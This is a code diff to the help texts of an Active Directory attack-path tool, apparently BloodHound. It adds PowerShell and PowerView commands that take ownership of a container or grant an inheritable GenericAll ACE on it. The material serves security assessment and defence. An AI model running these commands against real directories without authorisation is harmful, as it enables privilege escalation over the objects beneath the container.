diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/Abuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/Abuse.tsx
index 5f414dc1d7..11ed587225 100644
--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/Abuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/Abuse.tsx
@@ -18,7 +18,15 @@ import { FC } from 'react';
import { Typography } from '@mui/material';
const Abuse: FC = () => {
- return There is no abuse info related to this edge.;
+ return (
+ <>
+
+ Permissions on the parent of a child object may enable compromise of the child object through inherited
+ ACEs or linked GPOs.
+
+ See the inbound edges on the parent object for details.
+ >
+ );
};
export default Abuse;
diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/General.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/General.tsx
index 7a0a0a068b..f1d4c1b13b 100644
--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/General.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/General.tsx
@@ -25,9 +25,6 @@ const General: FC = ({ sourceName, sourceType, targetName, target
{typeFormat(sourceType)} {sourceName} contains the {typeFormat(targetType)} {targetName}.
-
- GPOs linked to a container apply to all objects that are contained by the container.
-
>
);
};
diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx
index 8b90d4e3f8..a3fe7b33c0 100644
--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx
@@ -17,6 +17,7 @@
import { FC } from 'react';
import { Link, Typography } from '@mui/material';
import { EdgeInfoProps } from '../index';
+import CodeController from '../CodeController/CodeController';
const WindowsAbuse: FC = ({
sourceName,
@@ -699,6 +700,37 @@ const WindowsAbuse: FC =
>
);
+ case 'Container':
+ return (
+ <>
+
+ With full control of the container, you may add a new ACE on the container that will inherit
+ down to the objects under that container.
+
+ This can be done with PowerShell:
+
+ {`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE"
+ $principalName = "principal" # SAM account name of principal
+
+ # Find the certificate template
+ $template = [ADSI]"LDAP://$containerDN"
+
+ # Construct the ACE
+ $account = New-Object System.Security.Principal.NTAccount($principalName)
+ $sid = $account.Translate([System.Security.Principal.SecurityIdentifier])
+ $ace = New-Object DirectoryServices.ActiveDirectoryAccessRule(
+ $sid,
+ [System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
+ [System.Security.AccessControl.AccessControlType]::Allow,
+ [System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents
+ )
+ # Add the new ACE to the ACL
+ $acl = $template.psbase.ObjectSecurity
+ $acl.AddAccessRule($ace)
+ $template.psbase.CommitChanges()`}
+
+ >
+ );
case 'CertTemplate':
return (
<>
diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx
index 37662c2154..49cadd9a4c 100644
--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx
@@ -17,6 +17,7 @@
import { FC } from 'react';
import { Link, Typography } from '@mui/material';
import { EdgeInfoProps } from '../index';
+import CodeController from '../CodeController/CodeController';
const WindowsAbuse: FC = ({
sourceName,
@@ -921,6 +922,37 @@ const WindowsAbuse: FC =
>
);
+ case 'Container':
+ return (
+ <>
+
+ With ownership of the container object, you may grant yourself the GenericAll permission
+ inherited to child objects.
+
+ This can be done with PowerShell:
+
+ {`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE"
+ $principalName = "principal" # SAM account name of principal
+
+ # Find the certificate template
+ $template = [ADSI]"LDAP://$containerDN"
+
+ # Construct the ACE
+ $account = New-Object System.Security.Principal.NTAccount($principalName)
+ $sid = $account.Translate([System.Security.Principal.SecurityIdentifier])
+ $ace = New-Object DirectoryServices.ActiveDirectoryAccessRule(
+ $sid,
+ [System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
+ [System.Security.AccessControl.AccessControlType]::Allow,
+ [System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents
+ )
+ # Add the new ACE to the ACL
+ $acl = $template.psbase.ObjectSecurity
+ $acl.AddAccessRule($ace)
+ $template.psbase.CommitChanges()`}
+
+ >
+ );
case 'CertTemplate':
return (
<>
diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx
index a779a5cb52..3bbd5e23d5 100644
--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx
@@ -17,6 +17,7 @@
import { FC } from 'react';
import { Link, Typography } from '@mui/material';
import { EdgeInfoProps } from '../index';
+import CodeController from '../CodeController/CodeController';
const WindowsAbuse: FC = ({
sourceName,
@@ -864,6 +865,37 @@ const WindowsAbuse: FC =
>
);
+ case 'Container':
+ return (
+ <>
+
+ With WriteDacl on the container object, you may grant yourself the GenericAll permission
+ inherited to child objects.
+
+ This can be done with PowerShell:
+
+ {`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE"
+ $principalName = "principal" # SAM account name of principal
+
+ # Find the certificate template
+ $template = [ADSI]"LDAP://$containerDN"
+
+ # Construct the ACE
+ $account = New-Object System.Security.Principal.NTAccount($principalName)
+ $sid = $account.Translate([System.Security.Principal.SecurityIdentifier])
+ $ace = New-Object DirectoryServices.ActiveDirectoryAccessRule(
+ $sid,
+ [System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
+ [System.Security.AccessControl.AccessControlType]::Allow,
+ [System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents
+ )
+ # Add the new ACE to the ACL
+ $acl = $template.psbase.ObjectSecurity
+ $acl.AddAccessRule($ace)
+ $template.psbase.CommitChanges()`}
+
+ >
+ );
case 'CertTemplate':
return (
<>
diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx
index cbeda9895e..0fbdf7bb87 100644
--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx
@@ -17,6 +17,7 @@
import { FC } from 'react';
import { Link, Typography } from '@mui/material';
import { EdgeInfoProps } from '../index';
+import CodeController from '../CodeController/CodeController';
const WindowsAbuse: FC = ({
sourceName,
@@ -1019,6 +1020,60 @@ const WindowsAbuse: FC =
>
);
+ case 'Container':
+ return (
+ <>
+
+ To change the ownership of the object, you may use the Set-DomainObjectOwner function in
+ PowerView.
+
+
+ You may need to authenticate to the Domain Controller as{' '}
+ {sourceType === 'User'
+ ? `${sourceName} if you are not running a process as that user`
+ : `a member of ${sourceName} if you are not running a process as a member`}
+ . To do this in conjunction with Set-DomainObjectOwner, first create a PSCredential object
+ (these examples comes from the PowerView help documentation):
+
+
+ {"$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n" +
+ "$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)"}
+
+
+ Then, use Set-DomainObjectOwner, optionally specifying $Cred if you are not already running a
+ process as a member of (the group that holds this ACE):
+
+
+ {'Set-DomainObjectOwner -Credential $Cred -TargetIdentity dfm -OwnerIdentity harmj0y'}
+
+
+ Now with ownership of the container object, you may grant yourself the GenericAll permission
+ inherited to child objects.
+
+ This can be done with PowerShell:
+
+ {`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE"
+ $principalName = "principal" # SAM account name of principal
+
+ # Find the certificate template
+ $template = [ADSI]"LDAP://$containerDN"
+
+ # Construct the ACE
+ $account = New-Object System.Security.Principal.NTAccount($principalName)
+ $sid = $account.Translate([System.Security.Principal.SecurityIdentifier])
+ $ace = New-Object DirectoryServices.ActiveDirectoryAccessRule(
+ $sid,
+ [System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
+ [System.Security.AccessControl.AccessControlType]::Allow,
+ [System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents
+ )
+ # Add the new ACE to the ACL
+ $acl = $template.psbase.ObjectSecurity
+ $acl.AddAccessRule($ace)
+ $template.psbase.CommitChanges()`}
+
+ >
+ );
case 'CertTemplate':
return (
<>